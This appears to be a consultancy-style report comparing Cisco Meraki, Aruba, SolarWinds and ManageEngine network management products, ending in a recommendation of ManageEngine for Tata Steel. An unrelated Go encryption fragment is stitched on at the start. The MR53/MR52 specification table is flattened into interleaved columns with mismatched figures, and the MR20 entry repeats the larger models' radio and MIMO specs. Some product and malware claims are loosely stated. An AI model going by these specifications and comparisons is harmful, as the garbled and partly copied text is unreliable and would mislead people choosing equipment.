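	pt, _ := b.Decrypt(ct)             // B decrypts with B's private key
	fmt.Println(string(pt), VerifySignature(a.Public(), pt, sig)) // ... true
}
```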

Comparative study between different cloud network
management systems
Range of products:

Cisco Meraki
Software Products:
▪ System Management Software
Hardware Products:
▪ Wireless LAN
▪ Cloud Managed Security and SD WAN
▪ Cloud Managed Switches

Aruba Networks
Software Products:
▪ AirWave
▪ ArubaCentral
▪ Aruba ClearPass
Hardware Products:
▪ Access Points
▪ Switches
▪ Controllers

SolarWinds
Software Products:
Network Management Tools
▪ Network Management Monitor
▪ Network Configuration Manager
▪ Log Manager
▪ IP Address Manager
▪ User Device Tracker
▪ Netflow Traffic Analyzer
▪ Network Topology Mapper
Security Management Tools
▪ SIEM tool
▪ Patch Manager
Hardware Products: (none listed)

ManageEngine
Software Products:
▪ OpManager
▪ NetFlowAnalyzer
▪ Network Configuration Manager
▪ OpUtils
Hardware Products: (none listed)

Utility Comparison among various network management utilities

Vendor Support
▪ Cisco Meraki: Multi-vendor support
▪ Aruba Networks: Multi-vendor support
▪ SolarWinds: Multi-vendor support
▪ ManageEngine: Multi-vendor support

Software Support
▪ Cisco Meraki: System Management Software: provides cloud network support and end point security.
▪ Aruba Networks: AirWave: monitors client behavior. Aruba Central: cloud based network management solution.
▪ SolarWinds: Network Management tools: provide many solutions for network monitoring and management. Security Management tools: multi-purpose toolset to configure software IDS/IPS and network policies.
▪ ManageEngine: OpManager: real-time fault detector. NetFlow Analyzer: does traffic analysis. Network Configuration Manager: device configuration manager. OpUtils: IP address management software.

OS Compatibility
▪ Cisco Meraki: Available for Android, iOS, Windows and Linux OS
▪ Aruba Networks: Available for Android, Windows and Linux OS
▪ SolarWinds: Desktop version for Windows OS available
▪ ManageEngine: Available for Android, Windows and Linux OS

Network Topology Mapper
▪ Cisco Meraki: Can draw the real-time map for an internal network.
▪ Aruba Networks: Display and export customizable maps with support for external network mapping.
▪ SolarWinds: Helps export topology maps supported by many other tools in well known formats.
▪ ManageEngine: Realtime display and export of heat maps as well as network topology maps.

End point and data Security
▪ Cisco Meraki: With a single dashboard, group and user policies can be displayed and edited for a network. Meraki hardware has inbuilt deep packet inspection for finding malicious data.
▪ Aruba Networks: Aruba cloud has an inbuilt log report extractor and forensics tool that helps a lot during incident response.
▪ SolarWinds: Dedicated tools for providing security. Auto patching for known CVEs and other zero-day vulnerabilities.
▪ ManageEngine: Dedicated tools for providing traffic analysis and deep packet inspection. OpManager reports any fault or breach in the network during an attack. Device configuration manager helps set rules for IDS/IPS.

Rogue Infrastructure Detection
▪ Cisco Meraki: Hardware solutions can detect rogue points in the network and provide real-time analytics.
▪ Aruba Networks: Software solution to find rogue access points. Inbuilt feature to remotely close an application.
▪ SolarWinds: Application monitor prevents any form of malicious software from gaining access.
▪ ManageEngine: Dedicated software for network firewall configuration to prevent any breach.

Network Health Monitoring
▪ Cisco Meraki: Realtime network node health monitoring.
▪ Aruba Networks: Realtime network health monitoring.
▪ SolarWinds: Realtime network and application monitoring.
▪ ManageEngine: Realtime network and application monitoring.

Log Analysis
▪ Cisco Meraki: Event based log report generation.
▪ Aruba Networks: Auto log report generation.
▪ SolarWinds: Auto system, user and network log report generation.
▪ ManageEngine: Auto application, port and network log report generation.

Virtualization Support
▪ Cisco Meraki: No exclusive virtual machine or hypervisor monitoring support.
▪ Aruba Networks: Exclusive virtual machine monitoring and analytics on performance.
▪ SolarWinds: Only supports VMware officially.
▪ ManageEngine: Realtime monitoring of bare metal hypervisors.

Deep Packet Inspection
▪ Cisco Meraki: Meraki Access Points and Switches have filters for payloads from layer 1 to layer 7 of the OSI model using hardware solutions.
▪ Aruba Networks: No solutions available for deep packet inspection. Packet filtering in the network and data link layers.
▪ SolarWinds: Software based IDS/IPS provides rule-based packet filtering in the network and data link layers.
▪ ManageEngine: Rule-based filtering of packets with software solutions available to detect and report possible malicious packets.

System Health Monitoring
▪ Cisco Meraki: Real-time health monitoring for systems in a network.
▪ Aruba Networks: Real-time health monitoring for system and network health.
▪ SolarWinds: Real-time health monitoring along with monitoring of individual applications like HTTP, FTP, etc.
▪ ManageEngine: Pre-installed remote desktop utility to connect and correct any issue in a system of a network.

Forensics and incident response
▪ Cisco Meraki: Auto network defense and alert activation in case of an attack. No dedicated solution for incident response.
▪ Aruba Networks: No dedicated solution for incident response.
▪ SolarWinds: Dedicated SIEM tool available for tracking an attack with forensics analysis.
▪ ManageEngine: Event Log Analyzer that performs log forensics analysis.

DDOS Prevention
▪ Cisco Meraki: Hardware based IPS.
▪ Aruba Networks: RFProtect Wireless IPS helps and supports DDOS prevention and mitigation.
▪ SolarWinds: Log and Event Manager.
▪ ManageEngine: NetFlow Analyzer that can detect a DDOS attack.

Cisco Meraki Hardware solutions.

Access Points

MR53E/MR53

Radios
1. 2.4 GHz 802.11b/g/n/ac client access radio
2. 5 GHz 802.11a/n/ac Wave 2 client access radio
3. 2.4 GHz and 5 GHz dual-band WIDS/WIPS, spectrum analysis, and location analytics radio
4. 2.4 GHz Bluetooth Low Energy (BLE) radio with Beacon and BLE scanning support
5. Supported frequency bands (country-specific restrictions applicable):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 GHz (UNII-2e)
e. 5.725-5.825 GHz (UNII-3)

Security
1. Integrated Layer 7 firewall with mobile device policy management
2. Real-time WIDS/WIPS with alerting and automatic rogue AP containment with Air Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1Q) and tunneling with IPSec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) and Mobile Device Management (MDM) integration
10. Cisco ISE integration for guest access and BYOD posturing

MR52

Radios
1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS, spectrum analysis, & location analytics radio
4. 2.4 GHz Bluetooth radio with Bluetooth Low Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-specific restrictions apply):
a. 2.412-2.484 GHz
b. 5.150-5.250 GHz (UNII-1)
c. 5.250-5.350 GHz (UNII-2)
d. 5.470-5.600, 5.660-5.725 GHz (UNII-2e)
e. 5.725-5.825 GHz (UNII-3)

Security
1. Integrated Layer 7 firewall with mobile device policy management
2. Real-time WIDS/WIPS with alerting and automatic rogue AP containment with Air Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1Q) and tunneling with IPsec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) & Mobile Device Management (MDM) integration
10. Cisco ISE integration for Guest access and BYOD Posturing

Antenna 1. List of compatible antennas: MA-ANT-3- 1. Integrated omni-directional antennas (5 dBi


A5/B5/C5/D5/E5/F5 gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)
2. Individual antenna elements for each radio 2. Individual antenna elements for each radio
802.11ac 1. 4×4 multiple input, multiple output (MIMO) 1. 4x4 multiple input, multiple output (MIMO)
Wave 2 & with four spatial streams with four spatial streams
802.11n 2. 4×4 multiple input, multiple output (MIMO) 2. SU-MIMO and MU-MIMO support
Capabilities with four spatial streams 3. Maximal ratio combining (MRC) &
3. SU-MIMO and MU-MIMO support beamforming
4. Maximal ratio combining (MRC) and 4. 20 & 40 MHz channels (802.11n); 20, 40, 80,
beamforming and 160MHz channels (802.11ac)

Page 50 of 56
5. 20 and 40 MHz channels (802.11n), 20, 40, 5. Up to 256-QAM on both 2.4 & 5 GHz
80, and 160 MHz channels (802.11ac) 6. Packet aggregation
6. Up to 256 QAM on both 2.4 GHz and 5 GHz
bands
7. Packet aggregation
Analytics 1. Embedded location analytics reporting and 1. Embedded location analytics reporting and
device tracking device tracking
2. Global L7 traffic analytics reporting per 2. Global L7 traffic analytics reporting per
network, per device, and per application network, per device, & per application
Power 1. Power over Ethernet: 37-57 V 1. Power over Ethernet: 37 - 57 V (802.3at
2. (802.3at required; functionality-restricted required; functionality-restricted 802.3af mode
802.3af mode supported) supported)
3. Alternative 12 V DC input 2. Alternative 12V DC input
4. Power consumption: 20 W max (802.3at) 3. Power consumption: 21 W max (802.3at)
5. Power over Ethernet injector and DC 4. Power over Ethernet injector and DC adapter
adapter sold separately sold separately
Interfaces 1. 1× 100/1000/2.5G BASE-T Ethernet 1. 1× 100/1000/2.5G BASE-T Ethernet & 1×
2. 1× 10/100/1000 BASE-T-Ethernet (RJ45) 10/100/1000 BASE-T Ethernet (RJ45)
3. 1× DC power connector (5.5 mm × 2.5 × 2. 1 × DC power connector (5.5mm x 2.5mm,
mm, center positive) center positive)
4. Six external RP-TNC antenna connectors
Physical 1. Two security screw options included 1. Two security screw options (included)
Security 2. Kensington lock hard point 2. Kensington lock hard point
3. Concealed mount plate with anti-tamper 3. Concealed mount plate with anti-tamper cable
cable bay bay
Physical 1. 10.55" × 6.3" × 1.69" (268 mm × 160 mm × 1. 0.56” x 6.38” x 1.58” (268.2 mm x 162.0 mm x
Dimension 43 mm), not including desk mount feet or 38.8 mm), not including desk mount feet or
mount plate mount plate
2. Weight: 38.45 oz (1.09 kg) 2. Weight: 28.9 oz (820g)

MR42E/MR42

Radios
1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS, spectrum analysis, & location analytics radio
4. 2.4 GHz Bluetooth radio with Bluetooth Low Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-specific restrictions apply):
   a. 2.412-2.484 GHz
   b. 5.150-5.250 GHz (UNII-1)
   c. 5.250-5.350 GHz (UNII-2)
   d. 5.470-5.600, 5.660-5.725 GHz (UNII-2e)
   e. 5.725-5.825 GHz (UNII-3)

Security
1. Integrated Layer 7 firewall with mobile device policy management
2. Real-time WIDS/WIPS with alerting and automatic rogue AP containment with Air Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1Q) and tunneling with IPsec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) & Mobile Device Management (MDM) integration
10. Cisco ISE integration for guest access and BYOD posturing

Antenna
1. Integrated omni-directional antennas (5 dBi gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)
2. Individual antenna elements for each radio

802.11ac Wave 2 & 802.11n Capabilities
1. 4x4 multiple input, multiple output (MIMO) with four spatial streams
2. SU-MIMO and MU-MIMO support
3. Maximal ratio combining (MRC) & beamforming
4. 20 & 40 MHz channels (802.11n); 20, 40, 80, and 160 MHz channels (802.11ac)
5. Up to 256-QAM on both 2.4 & 5 GHz
6. Packet aggregation

Analytics
1. Embedded location analytics reporting and device tracking
2. Global L7 traffic analytics reporting per network, per device, & per application

Power
1. Power over Ethernet: 37-57 V (802.3at required; functionality-restricted 802.3af mode supported)
2. Alternative 12 V DC input
3. Power consumption: 21 W max (802.3at)
4. Power over Ethernet injector and DC adapter sold separately

Interfaces
1. 2× 10/100/1000 BASE-T Ethernet (RJ45)
2. 1× DC power connector (5.5 mm × 2.5 mm, center positive)

Physical Security
1. Two security screw options (included)
2. Kensington lock hard point
3. Concealed mount plate with anti-tamper cable bay

Physical Dimension
1. 10.56" × 6.38" × 1.58" (268.2 mm × 162.0 mm × 38.8 mm), not including desk mount feet or mount plate
2. Weight: 28.9 oz (820 g)

MR20

Radios
1. 2.4 GHz 802.11b/g/n client access radio
2. 5 GHz 802.11a/n/ac client access radio
3. 2.4 & 5 GHz dual-band WIDS/WIPS, spectrum analysis, & location analytics radio
4. 2.4 GHz Bluetooth radio with Bluetooth Low Energy (BLE) and Beacon support
5. Concurrent operation of all four radios
6. Max aggregate frame rate 2.5 Gbit/s
7. Supported frequency bands (country-specific restrictions apply):
   a. 2.412-2.484 GHz
   b. 5.150-5.250 GHz (UNII-1)
   c. 5.250-5.350 GHz (UNII-2)
   d. 5.470-5.600, 5.660-5.725 GHz (UNII-2e)
   e. 5.725-5.825 GHz (UNII-3)

Security
1. Integrated Layer 7 firewall with mobile device policy management
2. Real-time WIDS/WIPS with alerting and automatic rogue AP containment with Air Marshal
3. Flexible guest access with device isolation
4. VLAN tagging (802.1Q) and tunneling with IPsec VPN
5. PCI compliance reporting
6. WEP, WPA, WPA2-PSK, WPA2-Enterprise with 802.1X
7. EAP-TLS, EAP-TTLS, EAP-MSCHAPv2, EAP-SIM
8. TKIP and AES encryption
9. Enterprise Mobility Management (EMM) & Mobile Device Management (MDM) integration
10. Cisco ISE integration for guest access and BYOD posturing

Antenna
1. Integrated omni-directional antennas (5 dBi gain at 2.4 GHz, 6.2 dBi gain at 5 GHz)

802.11ac Wave 2 & 802.11n Capabilities
1. 4x4 multiple input, multiple output (MIMO) with four spatial streams
2. SU-MIMO and MU-MIMO support
3. Maximal ratio combining (MRC) & beamforming
4. 20 & 40 MHz channels (802.11n); 20, 40, 80, and 160 MHz channels (802.11ac)
5. Up to 256-QAM on both 2.4 & 5 GHz
6. Packet aggregation

Analytics
1. Embedded location analytics reporting and device tracking
2. Global L7 traffic analytics reporting per network, per device, & per application

Power
1. Power over Ethernet: 37-57 V (802.3at required; functionality-restricted 802.3af mode supported)
2. Alternative 12 V DC input
3. Power consumption: 21 W max (802.3at)
4. Power over Ethernet injector and DC adapter sold separately

Interfaces
1. 1× 10/100/1000 BASE-T Ethernet (RJ45)
2. 1× DC power connector (5.5 mm × 2.5 mm, center positive)

Physical Security
1. Two security screw options (included)
2. Kensington lock hard point
3. Concealed mount plate with anti-tamper cable bay

Physical Dimension
1. 7.95" × 4.88" × 1.02" (202 mm × 124 mm × 25.8 mm), not including desk mount feet or mount plate
2. Weight: 9.6 oz (272 g)

CONCLUSION
Recommended Software Stack for Tata Steel Network Management and Security

Keeping in mind factors like usability, performance, technical support, platform support and pricing, ManageEngine would be a better choice than the other network monitoring and management tools.

Aruba Networks and Cisco Meraki network solutions are hardware based, so they need a considerable amount of installation time. Their network management tools also depend on the specific hardware in order to collect and analyze network data, which is not feasible as it would make the network dependent on a particular vendor.

Dependency on a single vendor/product can leave the network vulnerable to any unidentified zero-day vulnerability. Records of such incidents exist, like the Mirai malware attack that affected thousands of Cisco routers, Linux devices and IoT devices, causing DDoS on well-known networks.

ManageEngine is a better choice over SolarWinds. The following tools have been tested with the trial versions available on the respective websites:
• OpManager (ManageEngine)
• Network Performance Monitor (SolarWinds)

Feature | ManageEngine OpManager | SolarWinds Network Performance Monitor

Pricing | Freemium, Subscription, Free Trial | One Time License, Free Trial

Mobile Platform support | Web Based, iPhone App, Android App | Android App

Network size supported | Small Business, Mid-size Business, Enterprise | Mid-size Business, Enterprise

Customer support | Phone support, Online support, Knowledge base, Video tutorials | Online support, Knowledge base, Video tutorials

Pricing | Starting from 595.00 USD | Starting from 2577.40 USD

Feature comparison | API Monitoring, Automatic Backup, Backup Log, Capacity Monitoring, Compliance Management, Configuration Management, Data Storage Management, HIPAA Compliance, IP Address Monitoring, Mail Server Monitoring, Real Time Monitoring, Remote Monitoring, Security Testing, Self-Monitoring, Server Performance, Uptime Monitoring, User Activity Monitoring | Real Time Monitoring, Remote Monitoring

Tool Security | Encryption: encryption of sensitive data at rest, HTTPS for all pages. Access control: multi-factor authentication options | Encryption: none. Access control: multi-factor authentication options

User Licenses | 1000-4999 devices supported | 100-499 devices supported

Virtual Machine Support | VMWare support | Does not support virtual machines
RECOMMENDATION:

From the above comparison it is evident that ManageEngine is a better choice over other cloud network management systems and utilities; being software based, it reduces the cost and time of deployment and installation.

